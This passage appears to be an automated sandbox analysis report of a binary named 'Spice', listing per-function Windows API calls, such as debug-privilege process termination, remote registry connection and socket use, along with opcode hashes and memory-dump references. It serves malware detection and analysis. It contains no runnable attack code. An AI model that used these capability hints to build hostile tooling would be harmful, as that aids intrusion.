                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                      • API String ID: 1701285019-2896544425
                                                                                                                                                                                                                                      • Opcode ID: ae62eac6724046fd86d4e97f0c5f9dab9673f18fa57ad7f60a3dfbc3666787f1
                                                                                                                                                                                                                                      • Instruction ID: af04b4c4ba52ce740ae33713f4f56695831b077da7ee83751bb71f58806a6306
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae62eac6724046fd86d4e97f0c5f9dab9673f18fa57ad7f60a3dfbc3666787f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41B970200209DFDB21EF24CC95F6DB7E5AF80714F089019F94AAB2D2DB71A805CB86
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00ED357C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                      • Opcode ID: 7668ceccb7da9d2e82724368acd94f3da6e7a88bd8cf4971f40aa6ec8e0545ae
                                                                                                                                                                                                                                      • Instruction ID: 185d0395299c11e62e88643ad89892d1d4220b38087f3e301f48b5ebca48370d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7668ceccb7da9d2e82724368acd94f3da6e7a88bd8cf4971f40aa6ec8e0545ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87113D71609316BEEB104A35FC92DAA77DCDF05364B20201BF90076381E7A4BF4156A3
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ED4802
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00ED4809
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ED481F
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00ED4826
                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00ED484C
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED486A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00ED4847
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                                                                                                                                      • Opcode ID: 40fd88cc7ad971b651bdb20933da56cf2ddf53c8454ad0879b75f31e35508b51
                                                                                                                                                                                                                                      • Instruction ID: 59366f010a43499d820e0461a09f3717095898ee38e60417e6cca61f7251c222
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40fd88cc7ad971b651bdb20933da56cf2ddf53c8454ad0879b75f31e35508b51
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06014BF690024CBFE711ABA09D89FF7736CEB08300F4005A6BB49E2141EE749E859B75
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00EFDB42
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00EFDB62
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EFDD9D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFDDBB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFDDDC
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00EFDDFB
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EFDE20
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EFDE43
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1211466189-0
                                                                                                                                                                                                                                      • Opcode ID: ef6e259689b295c04ff4ff3cb137286906cde860ce81150921f8a8a79416e56c
                                                                                                                                                                                                                                      • Instruction ID: 92bb22bc494095f169ef224c61992afe040548f7711b77e67c64ba8e2133d95c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef6e259689b295c04ff4ff3cb137286906cde860ce81150921f8a8a79416e56c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44B1BA31A04219EFCF14CF28C9887BD7BB2FF44705F089169EE48AE295DB31A950CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF044E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3479070676-0
                                                                                                                                                                                                                                      • Opcode ID: 18fecc021ea883b6562dde3dd50f131a74b681da71dd789c3e0875e8c17dfc98
                                                                                                                                                                                                                                      • Instruction ID: 9a6d9128673a9ca3cbe710a2579a24e1e526ab679ff9dcbca99b7cff659baf8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18fecc021ea883b6562dde3dd50f131a74b681da71dd789c3e0875e8c17dfc98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21A14970204205DFC721EF24C881F7EB7E5AF84314F14991DFA99A72A2DB31E945DB41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000), ref: 00E72E9F
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000,000000FF), ref: 00E72EE7
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000), ref: 00EAC55B
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC508,00000004,00000000,00000000,00000000), ref: 00EAC5C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                                      • Opcode ID: 34546f2863662f167506be7a1d859ed6633a86fcbe34680e3ef701df7fad3567
                                                                                                                                                                                                                                      • Instruction ID: 38c7f6117755dde2571c2890cb713d1951b53b4ee52e03a4f44a1b6119ec4e22
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34546f2863662f167506be7a1d859ed6633a86fcbe34680e3ef701df7fad3567
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3141DC316046849AD7375728CC88BAA7B92FB86314F24F41EF68F76560CB76B840D715
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED7698
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ED76CF
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00ED76EB
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00ED7739
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00ED7756
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00ED7765
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ED777A
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7799
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 256516436-0
                                                                                                                                                                                                                                      • Opcode ID: 349b2320d094c1a0690235f3fedf78c78271eaa4097833e4ff3e4e4e5094b3da
                                                                                                                                                                                                                                      • Instruction ID: e7f0d2c985e68298f2191bbbcc3f42d127857a1620a86ca952ee4aa8b1f608ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 349b2320d094c1a0690235f3fedf78c78271eaa4097833e4ff3e4e4e5094b3da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E315C31A04209EFCF10EF64DC85EAEB7B8FF45710F1440A6F904AA256EB709A55DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EF6810
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EF6818
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF6823
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EF682F
                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF686B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF687C
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF68B6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF68D6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                      • Opcode ID: d53d73ccc174060bb336d196a613308488001d01d2c62a27a6c9b26ef02a8f31
                                                                                                                                                                                                                                      • Instruction ID: e2d65a86d11f33d97e0a8af1766f5fc356f1ebd36ab059fded6070e6310154cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d53d73ccc174060bb336d196a613308488001d01d2c62a27a6c9b26ef02a8f31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8316D72101258BFEB158F10CC4AFEA3BADFF49765F044055FE08AA291CA759851DBB4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                                                                                      • Opcode ID: 21962c1ce48ed34360eb241adb6322efee4e1e07a27dbd8f7efc6192bca139da
                                                                                                                                                                                                                                      • Instruction ID: b0a10da480a60acc17f2ec7ccc2c395b3d09ea109da9f35b47577a4e8de902fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21962c1ce48ed34360eb241adb6322efee4e1e07a27dbd8f7efc6192bca139da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7921C873B452067AE60575208F42FAF379CDE11748B286029FD0AB6383E712DE13D6A2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                        • Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D
                                                                                                                                                                                                                                      • _wcstok.LIBCMT ref: 00EDF2D7
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00EDF366
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EDF399
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                                                                                                                                      • Opcode ID: 7ed210c486d0a6a0007684d83b361cd2e5330afe8ebbe2532e5db434207269c6
                                                                                                                                                                                                                                      • Instruction ID: a8f592050af68d01408e9cfe56de16212db1de5c05974d58fc80ca7608ab7447
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ed210c486d0a6a0007684d83b361cd2e5330afe8ebbe2532e5db434207269c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5C16B715043419FC714EF24D881A5AB7E4EF85354F10996EF89AAB3A2DB30ED46CB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EE72EB
                                                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EE730C
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE731F
                                                                                                                                                                                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00EE73D5
                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00EE7392
                                                                                                                                                                                                                                        • Part of subcall function 00ECB4EA: _strlen.LIBCMT ref: 00ECB4F4
                                                                                                                                                                                                                                        • Part of subcall function 00ECB4EA: _memmove.LIBCMT ref: 00ECB516
                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00EE742F
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00EE7498
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3619996494-0
                                                                                                                                                                                                                                      • Opcode ID: 7aabde84d6f3bf4bc3602184a2516697b89efb1ec687a7d5534a4fbad004e2fe
                                                                                                                                                                                                                                      • Instruction ID: 3eecfec21549b79a1fdff32c296e61d0895faceeb59aeb061c1ce91e40b7c762
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aabde84d6f3bf4bc3602184a2516697b89efb1ec687a7d5534a4fbad004e2fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1681C2B1108244ABC710EB25DC81F6AB7E8EF88714F10A51CF599BB2E2EB70DD01CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 796295da2aa4b7fa4c0ee97650b492fc78e2d956e1259b2bad4191fef13e264a
                                                                                                                                                                                                                                      • Instruction ID: ad7a8332cda7a70e4862368de3314bc3f934713c23e0be46a3c84d6ab24cfcf7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 796295da2aa4b7fa4c0ee97650b492fc78e2d956e1259b2bad4191fef13e264a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF714F30900209EFDB08CF58CC45ABE7B75FF8A314F14C199F919BA251C730AA51DBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(013B5878), ref: 00EFBA5D
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(013B5878), ref: 00EFBA69
